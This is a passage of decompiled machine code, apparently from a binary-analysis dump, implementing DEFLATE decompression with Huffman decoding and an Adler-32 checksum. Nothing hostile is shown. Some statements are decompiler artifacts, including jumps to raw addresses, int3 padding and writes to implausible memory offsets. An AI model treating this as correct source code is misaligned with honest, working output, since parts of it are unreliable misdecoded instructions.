																						 *(_t2870 - 0x10) = _t2086;
																						if( *(_t2870 - 0x10) >= 3) {
																							do {
																								goto L522;
																								L523:
																								 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t1789 * 0));
																								 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 0)));
																								 *((char*)( *(_t2870 - 0x14) + (1 << 1))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 1)));
																								_t2086 =  *(_t2870 - 0x14) + 3;
																								 *(_t2870 - 0x14) = _t2086;
																								 *(_t2870 - 0x30) =  *(_t2870 - 0x30) + 3;
																								_t1789 =  *(_t2870 - 0x10) - 3;
																								 *(_t2870 - 0x10) = _t1789;
																							} while ( *(_t2870 - 0x10) > 2);
																							if( *(_t2870 - 0x10) > 0) {
																								_t1798 =  *(_t2870 - 0x14);
																								 *_t1798 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2086 * 0));
																								if( *(_t2870 - 0x10) > 1) {
																									 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t1798 << 0)));
																								}
																								_t2086 =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
																								 *(_t2870 - 0x14) = _t2086;
																							}
																						} else {
																							if( *(_t2870 - 0x10) != 0) {
																								_t2086 =  *(_t2870 - 0x14);
																								 *_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2612 * 0));
																								if( *(_t2870 - 0x10) > 1) {
																									_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t2086 << 0)));
																									 *( *(_t2870 - 0x14) + (1 << 0)) = _t2086;
																								}
																								 *(_t2870 - 0x14) =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
																							}
																						}
																						goto L350;
																					}
																					L601:
																					 *(_t2075 + 0x5189f455) =  *(_t2075 + 0x5189f455) | _t2086;
																					 *(_t2075 + 0x4289f045) =  *(_t2075 + 0x4289f045) | _t2086;
																					_t2870 = _t2870;
																					 *(_t2075 + 0x5189dc55) =  *(_t2075 + 0x5189dc55) | _t2086;
																					 *((intOrPtr*)(_t2075 + 0x4d8b0845)) =  *((intOrPtr*)(_t2075 + 0x4d8b0845)) - _t2086;
																					asm("cld");
																					 *( *(_t2870 + 0x10)) = _t2465 + 1 -  *(_t2870 + 0xc);
																					 *( *(_t2870 + 0x1c)) =  *(_t2870 - 0x14) -  *(_t2870 + 0x18);
																					if(( *(_t2870 + 0x20) & 0x00000009) != 0 &&  *(_t2870 - 0x1c) >= 0) {
																						 *(_t2870 - 0x58) =  *(_t2870 + 0x18);
																						 *(_t2870 - 0x98) =  *( *(_t2870 + 0x1c));
																						 *(_t2870 - 0x20) =  *( *(_t2870 + 8) + 0x1c) & 0x0000ffff;
																						 *(_t2870 - 0x2c) =  *( *(_t2870 + 8) + 0x1c) >> 0x10;
																						_t1700 =  *(_t2870 - 0x98);
																						_t1701 = _t1700 / 0x15b0;
																						_t2473 = _t1700 % 0x15b0;
																						 *(_t2870 - 0xa0) = _t2473;
																						while( *(_t2870 - 0x98) != 0) {
																							 *(_t2870 - 0x84) = 0;
																							while( *(_t2870 - 0x84) + 7 <  *(_t2870 - 0xa0)) {
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + _t2473 * 0) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 0)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 1)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 3) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 2)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 5) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 6) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 7) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								_t2473 =  *(_t2870 - 0x84) + 8;
																								 *(_t2870 - 0x84) = _t2473;
																								_t1701 =  *(_t2870 - 0x58) + 8;
																								 *(_t2870 - 0x58) = _t1701;
																							}
																							while(1) {
																								_t2097 =  *(_t2870 - 0x84);
																								if(_t2097 >=  *(_t2870 - 0xa0)) {
																									break;
																								}
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x58) =  *(_t2870 - 0x58) + 1;
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								_t1701 =  *(_t2870 - 0x84) + 1;
																								 *(_t2870 - 0x84) = _t1701;
																							}
																							goto 0x140d69;
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							 *(_t2870 - 0x20) = _t1701 % _t2097;
																							_t1706 =  *(_t2870 - 0x2c);
																							_t1701 = _t1706 / 0xfff1;
																							 *(_t2870 - 0x2c) = _t1706 % 0xfff1;
																							_t2473 =  *(_t2870 - 0x98) -  *(_t2870 - 0xa0);
																							 *(_t2870 - 0x98) = _t2473;
																							 *(_t2870 - 0xa0) = 0x15b0;
																						}
																						_t1704 = ( *(_t2870 - 0x2c) << 0x10) +  *(_t2870 - 0x20);
																						_t2094 =  *(_t2870 + 8);
																						 *((intOrPtr*)(_t2094 + 0x1c)) = _t1704;
																						if( *(_t2870 - 0x1c) == 0 && ( *(_t2870 + 0x20) & 0x00000001) != 0) {
																							goto 0x140d81;
																							asm("int3");
																							if( *((intOrPtr*)(_t1704 + 0x1c)) !=  *((intOrPtr*)(_t2094 + 0x10))) {
																								 *(_t2870 - 0x1c) = 0xfffffffe;
																							}
																						}
																					}
																					_t1688 =  *(_t2870 - 0x1c);
																					goto L622;
																				} else {
																					goto L502;
																				}
																			} else {
																				_t1789 =  *(_t2870 + 0x20) & 0x00000004;
																				if(_t1789 == 0) {
																					goto L498;
																				} else {
																					L495:
																					 *(_t2870 - 0x1c) = 0xffffffff;
																					_t2086 =  *(_t2870 + 8);
																					 *_t2086 = 0x25;
																				}
																			}
																		} else {
																			L476:
																			_t2233 =  *(_t2870 - 8);
																			if(_t2233 >=  *(_t2870 - 0x24)) {
																				L490:
																				goto 0x140cba;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				 *(_t2870 - 0x120) = (_t2592 << _t2233) - 0x00000001 &  *(_t2870 - 0xc);
																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																				 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																				_t2592 = 0;
																				if(0 != 0) {
																					goto L476;
																				} else {
																					_t1789 =  *(_t2870 - 0x28) +  *(_t2870 - 0x120);
																					 *(_t2870 - 0x28) = _t1789;
																					goto L493;
																				}
																			} else {
																				L477:
																				_t2465 =  *(_t2870 - 4);
																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xdc) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L488;
																				} else {
																					L478:
																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t1692 == 0) {
																						 *(_t2870 - 0xdc) = 0;
																						L486:
																						L488:
																						if(0 != 0) {
																							goto L477;
																						} else {
																							_t2592 =  *(_t2870 - 0xdc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 0xc) = _t2592;
																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																							_t2233 =  *(_t2870 - 8);
																							if(_t2233 <  *(_t2870 - 0x24)) {
																								goto L477;
																							} else {
																								goto L490;
																							}
																						}
																					} else {
																						L479:
																						 *(_t2870 - 0x1c) = 1;
																						_t2086 =  *(_t2870 + 8);
																						 *_t2086 = 0x1b;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t2190 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																	if(_t2190 >= 2) {
																		_t1769 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
																		 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2190 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
																		 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
																		goto L468;
																	} else {
																		L439:
																		_t1769 =  *((short*)( *(_t2870 + 8) + (_t2566 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																		 *(_t2870 - 0x44) = _t1769;
																		if( *(_t2870 - 0x44) < 0) {
																			if( *(_t2870 - 8) <= 0xa) {
																				goto L452;
																			} else {
																				 *(_t2870 - 0x4c) = 0xa;
																				do {
																					_t2588 =  *(_t2870 + 8) + (_t1769 << 0) + 0x40;
																					_t1769 =  !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001);
																					 *(_t2870 - 0x44) =  *((short*)(_t2588 + 0x920 + _t1769 * 2));
																					 *(_t2870 - 0x4c) =  *(_t2870 - 0x4c) + 1;
																					if( *(_t2870 - 0x44) < 0) {
																						goto L449;
																					}
																					break;
																					L449:
																					_t1769 =  *(_t2870 - 0x4c) + 1;
																				} while ( *(_t2870 - 8) >= _t1769);
																				if( *(_t2870 - 0x44) < 0) {
																					goto L452;
																				} else {
																					goto L465;
																				}
																			}
																		} else {
																			 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
																			if( *(_t2870 - 0x4c) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x4c)) {
																				L452:
																				_t2086 =  *(_t2870 - 4);
																				if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xd4) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L463;
																				} else {
																					L453:
																					_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t2465 == 0) {
																						 *(_t2870 - 0xd4) = 0;
																						L461:
																						L463:
																						if(0 != 0) {
																							goto L452;
																						} else {
																							_t2566 =  *(_t2870 - 0xd4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 0xc) = _t2566;
																							_t1769 =  *(_t2870 - 8) + 8;
																							 *(_t2870 - 8) = _t1769;
																							if( *(_t2870 - 8) < 0xf) {
																								goto L439;
																							} else {
																								goto L465;
																							}
																						}
																					} else {
																						L454:
																						 *(_t2870 - 0x1c) = 1;
																						_t1692 =  *(_t2870 + 8);
																						 *_t1692 = 0x1a;
																					}
																				}
																			} else {
																				L465:
																				goto L468;
																			}
																		}
																	}
																}
															} else {
																L421:
																if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
																	L435:
																	goto 0x140c45;
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	 *(_t2870 - 0x124) = (_t2566 << _t2180) - 0x00000001 &  *(_t2870 - 0xc);
																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																	_t2180 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																	 *(_t2870 - 8) = _t2180;
																	_t2566 = 0;
																	if(0 != 0) {
																		goto L421;
																	} else {
																		_t1769 =  *(_t2870 - 0x10) +  *(_t2870 - 0x124);
																		 *(_t2870 - 0x10) = _t1769;
																		goto L437;
																	}
																} else {
																	L422:
																	_t2086 =  *(_t2870 - 4);
																	if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																		 *(_t2870 - 0xa4) =  *( *(_t2870 - 4)) & 0x000000ff;
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																		goto L433;
																	} else {
																		L423:
																		_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																		if(_t2465 == 0) {
																			 *(_t2870 - 0xa4) = 0;
																			L431:
																			L433:
																			if(0 != 0) {
																				goto L422;
																			} else {
																				_t2566 =  *(_t2870 - 0xa4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																				 *(_t2870 - 0xc) = _t2566;
																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																				_t2180 =  *(_t2870 - 8);
																				if(_t2180 <  *(_t2870 - 0x24)) {
																					goto L422;
																				} else {
																					goto L435;
																				}
																			}
																		} else {
																			L424:
																			 *(_t2870 - 0x1c) = 1;
																			_t1692 =  *(_t2870 + 8);
																			 *_t1692 = 0x19;
																		}
																	}
																}
															}
														} else {
															L531:
															_t1692 =  *( *(_t2870 + 8) + 0x14) & 0x00000001;
															if(_t1692 == 0) {
																L48:
																if( *(_t2870 - 8) >= 3) {
																	L62:
																	 *( *(_t2870 + 8) + 0x14) =  *(_t2870 - 0xc) & 0x00000007;
																	 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 3;
																	 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
																	if(0 != 0) {
																		goto L48;
																	} else {
																		 *( *(_t2870 + 8) + 0x18) =  *( *(_t2870 + 8) + 0x14) >> 1;
																		_t1692 =  *(_t2870 + 8);
																		if( *((intOrPtr*)(_t1692 + 0x18)) != 0) {
																			_t2086 =  *(_t2870 + 8);
																			if( *((intOrPtr*)(_t2086 + 0x18)) != 3) {
																				if( *( *(_t2870 + 8) + 0x18) != 1) {
																					 *(_t2870 - 0x10) = 0;
																					L189:
																					if( *(_t2870 - 0x10) >= 3) {
																						goto 0x140a5e;
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push( *(_t2870 + 8) + (_t1692 << 1) + 0x40);
																						_t1743 =  *( *0x00CE9D9D)();
																						_t2873 = _t2873 + 0xc;
																						 *(_t2870 - 0x10) = 0;
																						L210:
																						_t2136 =  *(_t2870 + 8);
																						if( *(_t2870 - 0x10) >=  *((intOrPtr*)(_t2136 + (_t1743 << 1) + 0x2c))) {
																							 *((intOrPtr*)( *(_t2870 + 8) + (_t2136 << 1) + 0x2c)) = 0x13;
																							goto L231;
																						} else {
																							L212:
																							if( *(_t2870 - 8) >= 3) {
																								L226:
																								 *(_t2870 - 0x114) =  *(_t2870 - 0xc) & 0x00000007;
																								_t1987 =  *(_t2870 - 0xc) >> 3;
																								 *(_t2870 - 0xc) = _t1987;
																								 *(_t2870 - 8) =  *(_t2870 - 8) - 3;
																								if(0 != 0) {
																									goto L212;
																								} else {
																									_t1743 =  *(_t2870 - 0x114);
																									 *( *(_t2870 + 8) + (_t1987 << 1) + 0x40 + ( *( *(_t2870 - 0x10) + 0x13ba14) & 0x000000ff)) = _t1743;
																									 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
																									goto L210;
																								}
																							} else {
																								L213:
																								_t1692 =  *(_t2870 - 4);
																								if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																									 *(_t2870 - 0xc0) =  *( *(_t2870 - 4)) & 0x000000ff;
																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																									goto L224;
																								} else {
																									L214:
																									_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																									if(_t2086 == 0) {
																										 *(_t2870 - 0xc0) = 0;
																										L222:
																										L224:
																										if(0 != 0) {
																											goto L213;
																										} else {
																											 *(_t2870 - 0xc) =  *(_t2870 - 0xc0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																											if( *(_t2870 - 8) < 3) {
																												goto L213;
																											} else {
																												goto L226;
																											}
																										}
																									} else {
																										L215:
																										 *(_t2870 - 0x1c) = 1;
																										_t2465 =  *(_t2870 + 8);
																										 *_t2465 = 0xe;
																									}
																								}
																							}
																						}
																					} else {
																						L190:
																						_t428 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
																						if( *(_t2870 - 8) >=  *_t428) {
																							L204:
																							_t456 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
																							 *( *(_t2870 + 8) + 0x2c +  *(_t2870 - 0x10) * 4) = (0x00000001 <<  *_t456) - 0x00000001 &  *(_t2870 - 0xc);
																							_t464 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
																							 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *_t464;
																							_t468 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
																							_t2759 =  *_t468;
																							_t2000 =  *(_t2870 - 8) - _t2759;
																							 *(_t2870 - 8) = _t2000;
																							if(0 != 0) {
																								goto L190;
																							} else {
																								goto 0x140a4a;
																								asm("int3");
																								_t1692 =  *(_t2870 - 0x10);
																								 *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1692 * 4)) =  *((intOrPtr*)(_t2000 + 0x2c + _t2759 * 4)) +  *((intOrPtr*)(0x13ba28 +  *(_t2870 - 0x10) * 4));
																								 *(_t2870 - 0x10) =  *(_t2870 - 0x10) + 1;
																								goto L189;
																							}
																						} else {
																							L191:
																							_t2465 =  *(_t2870 - 4);
																							if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																								 *(_t2870 - 0xe0) =  *( *(_t2870 - 4)) & 0x000000ff;
																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																								goto L202;
																							} else {
																								L192:
																								_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																								if(_t1692 == 0) {
																									 *(_t2870 - 0xe0) = 0;
																									L200:
																									L202:
																									if(0 != 0) {
																										goto L191;
																									} else {
																										 *(_t2870 - 0xc) =  *(_t2870 - 0xe0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																										 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																										_t453 =  *(_t2870 - 0x10) + 0x13b010; // 0x7030200
																										if( *(_t2870 - 8) <  *_t453) {
																											goto L191;
																										} else {
																											goto L204;
																										}
																									}
																								} else {
																									L193:
																									 *(_t2870 - 0x1c) = 1;
																									_t2086 =  *(_t2870 + 8);
																									 *_t2086 = 0xb;
																								}
																							}
																						}
																					}
																				} else {
																					 *(_t2870 - 0x60) =  *(_t2870 + 8) + 0x40 + _t1692 * 0;
																					 *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) = 0x120;
																					 *( *(_t2870 + 8) + 0xbadbd9) = 0x20;
																					_push(0x20);
																					_push(5);
																					_push( *(_t2870 + 8) + 0xbadbed);
																					_t2086 =  *0x00CE9D9D;
																					 *_t2086();
																					_t2873 = _t2873 + 0xc;
																					 *(_t2870 - 0x5c) = 0;
																					while( *(_t2870 - 0x5c) <= 0x8f) {
																						 *( *(_t2870 - 0x60)) = 8;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0xff) {
																						 *( *(_t2870 - 0x60)) = 9;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0x117) {
																						 *( *(_t2870 - 0x60)) = 7;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					while( *(_t2870 - 0x5c) <= 0x11f) {
																						 *( *(_t2870 - 0x60)) = 8;
																						_t2086 =  *(_t2870 - 0x60) + 1;
																						 *(_t2870 - 0x60) = _t2086;
																						 *(_t2870 - 0x5c) =  *(_t2870 - 0x5c) + 1;
																					}
																					L231:
																					L233:
																					if( *( *(_t2870 + 8) + 0x18) < 0) {
																						goto L350;
																					} else {
																						 *((intOrPtr*)(_t2870 - 0x68)) =  *(_t2870 + 8) + 0x40 +  *( *(_t2870 + 8) + 0x18) * 0xda0;
																						_push(0x40);
																						_push(0);
																						_push(_t2870 - 0x1a8);
																						 *( *0x00CE9D9D)();
																						_push(0x800);
																						_push(0);
																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x120);
																						 *( *0x00CE9D9D)();
																						_push(0x480);
																						_push(0);
																						_push( *((intOrPtr*)(_t2870 - 0x68)) + 0x920);
																						 *( *0x00CE9D9D)();
																						_t2873 = _t2873 + 0x24;
																						 *(_t2870 - 0x64) = 0;
																						while( *(_t2870 - 0x64) <  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
																							 *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) =  *((intOrPtr*)(_t2870 + ( *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x64)) & 0x000000ff) * 4 - 0x1a8)) + 1;
																							 *(_t2870 - 0x64) =  *(_t2870 - 0x64) + 1;
																						}
																						 *(_t2870 - 0xd8) = 0;
																						 *(_t2870 - 0x9c) = 0;
																						_t1692 = 4 << 0;
																						 *(_t2870 + 0xfffffffffffffe9c) = 0;
																						_t2465 = 0;
																						 *(_t2870 + 0xfffffffffffffe98) = 0;
																						 *(_t2870 - 0x64) = 1;
																						while( *(_t2870 - 0x64) <= 0xf) {
																							 *(_t2870 - 0xd8) =  *(_t2870 - 0xd8) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8));
																							 *(_t2870 - 0x9c) =  *(_t2870 - 0x9c) +  *((intOrPtr*)(_t2870 +  *(_t2870 - 0x64) * 4 - 0x1a8)) << 1;
																							_t2465 =  *(_t2870 - 0x64);
																							 *(_t2870 + _t2465 * 4 - 0x164) =  *(_t2870 - 0x9c);
																							_t1692 =  *(_t2870 - 0x64) + 1;
																							 *(_t2870 - 0x64) = _t1692;
																						}
																						if( *(_t2870 - 0x9c) == 0x10000 ||  *(_t2870 - 0xd8) <= 1) {
																							 *(_t2870 - 0x78) = 0xffffffff;
																							 *(_t2870 - 0x80) = 0;
																							while(1) {
																								_t2666 =  *(_t2870 - 0x80);
																								if(_t2666 >=  *((intOrPtr*)( *(_t2870 + 8) + 0x2c +  *( *(_t2870 + 8) + 0x18) * 4))) {
																									break;
																								}
																								 *(_t2870 - 0x34) = 0;
																								 *(_t2870 - 0x74) =  *( *((intOrPtr*)(_t2870 - 0x68)) +  *(_t2870 - 0x80)) & 0x000000ff;
																								if( *(_t2870 - 0x74) != 0) {
																									 *(_t2870 - 0xe8) =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168);
																									_t2719 =  *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) + 1;
																									 *(_t2870 +  *(_t2870 - 0x74) * 4 - 0x168) = _t2719;
																									_t2331 =  *(_t2870 - 0x74);
																									 *(_t2870 - 0xc8) = _t2331;
																									while( *(_t2870 - 0xc8) > 0) {
																										_t2331 =  *(_t2870 - 0x34) << 0x00000001 |  *(_t2870 - 0xe8) & 0x00000001;
																										 *(_t2870 - 0x34) = _t2331;
																										_t2719 =  *(_t2870 - 0xc8) - 1;
																										 *(_t2870 - 0xc8) = _t2719;
																										 *(_t2870 - 0xe8) =  *(_t2870 - 0xe8) >> 1;
																									}
																									if( *(_t2870 - 0x74) > 0xa) {
																										 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2));
																										if( *(_t2870 - 0x6c) == 0) {
																											 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x120 + ( *(_t2870 - 0x34) & 0x000003ff) * 2)) =  *(_t2870 - 0x78);
																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
																											 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
																										}
																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 9;
																										 *(_t2870 - 0xd0) =  *(_t2870 - 0x74);
																										while( *(_t2870 - 0xd0) > 0xb) {
																											 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
																											 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
																											if( *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) != 0) {
																												 *(_t2870 - 0x6c) =  *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2));
																											} else {
																												 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x78);
																												 *(_t2870 - 0x6c) =  *(_t2870 - 0x78);
																												 *(_t2870 - 0x78) =  *(_t2870 - 0x78) - 2;
																											}
																											 *(_t2870 - 0xd0) =  *(_t2870 - 0xd0) - 1;
																										}
																										 *(_t2870 - 0x34) =  *(_t2870 - 0x34) >> 1;
																										 *(_t2870 - 0x6c) =  *(_t2870 - 0x6c) - ( *(_t2870 - 0x34) & 0x00000001);
																										 *((short*)( *((intOrPtr*)(_t2870 - 0x68)) + 0x91e +  ~( *(_t2870 - 0x6c)) * 2)) =  *(_t2870 - 0x80);
																									} else {
																										 *((short*)(_t2870 - 0xcc)) =  *(_t2870 - 0x74) << 0x00000009 |  *(_t2870 - 0x80);
																										while( *(_t2870 - 0x34) < 0x400) {
																											goto 0x140ab1;
																											asm("int3");
																											 *((short*)(_t2719 + 0x120 + _t2331 * 2)) =  *((intOrPtr*)(_t2870 - 0xcc));
																											_t2331 =  *(_t2870 - 0x74);
																											_t2719 = (1 << _t2331) +  *(_t2870 - 0x34);
																											 *(_t2870 - 0x34) = 1;
																										}
																									}
																									goto L248;
																								} else {
																									L248:
																									 *(_t2870 - 0x80) =  *(_t2870 - 0x80) + 1;
																									continue;
																								}
																								break;
																							}
																							if( *( *(_t2870 + 8) + 0x18) != 2) {
																								L349:
																								_t2086 =  *( *(_t2870 + 8) + 0x18) - 1;
																								 *( *(_t2870 + 8) + 0x18) = _t2086;
																								goto L233;
																							} else {
																								 *(_t2870 - 0x10) = 0;
																								L274:
																								_t2669 =  *(_t2870 + 8);
																								_t1900 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2666 * 0)) +  *((intOrPtr*)(_t2669 + 0x30));
																								if( *(_t2870 - 0x10) >= _t1900) {
																									_t2086 = 4 << 0;
																									_t2465 =  *(_t2870 + 8);
																									_t1903 =  *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t2669 * 0)) +  *((intOrPtr*)(_t2465 + 0x30));
																									if(_t1903 ==  *(_t2870 - 0x10)) {
																										_push( *((intOrPtr*)( *(_t2870 + 8) + 0x2c + _t1903 * 0)));
																										_push( *(_t2870 + 8) + 0x2924);
																										_push( *(_t2870 + 8) + 0x40);
																										 *((intOrPtr*)( *0x0013C1F0))();
																										_push( *( *(_t2870 + 8) + 0xbadbd9));
																										_push( *(_t2870 + 8) +  *((intOrPtr*)( *(_t2870 + 8) + 0x2c)) + 0x2924);
																										_push( *(_t2870 + 8) + 0xbadbed);
																										 *((intOrPtr*)( *((intOrPtr*)(0x13c1f0))))();
																										_t2873 = _t2873 + 0x18;
																										goto L349;
																									} else {
																										L344:
																										 *(_t2870 - 0x1c) = 0xffffffff;
																										_t1692 =  *(_t2870 + 8);
																										 *_t1692 = 0x15;
																									}
																								} else {
																									L276:
																									if( *(_t2870 - 8) >= 0xf) {
																										L307:
																										_t2296 =  *((short*)( *(_t2870 + 8) + (_t1900 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																										 *(_t2870 - 0x40) = _t2296;
																										if( *(_t2870 - 0x40) < 0) {
																											 *(_t2870 - 0x48) = 0xa;
																											do {
																												 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2296 << 1) + 0x40 + 0x920 + ( !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001)) * 2));
																												_t2296 =  *(_t2870 - 0x48) + 1;
																												 *(_t2870 - 0x48) = _t2296;
																											} while ( *(_t2870 - 0x40) < 0);
																										} else {
																											 *(_t2870 - 0x48) =  *(_t2870 - 0x40) >> 9;
																											 *(_t2870 - 0x40) =  *(_t2870 - 0x40) & 0x000001ff;
																										}
																										 *(_t2870 - 0x28) =  *(_t2870 - 0x40);
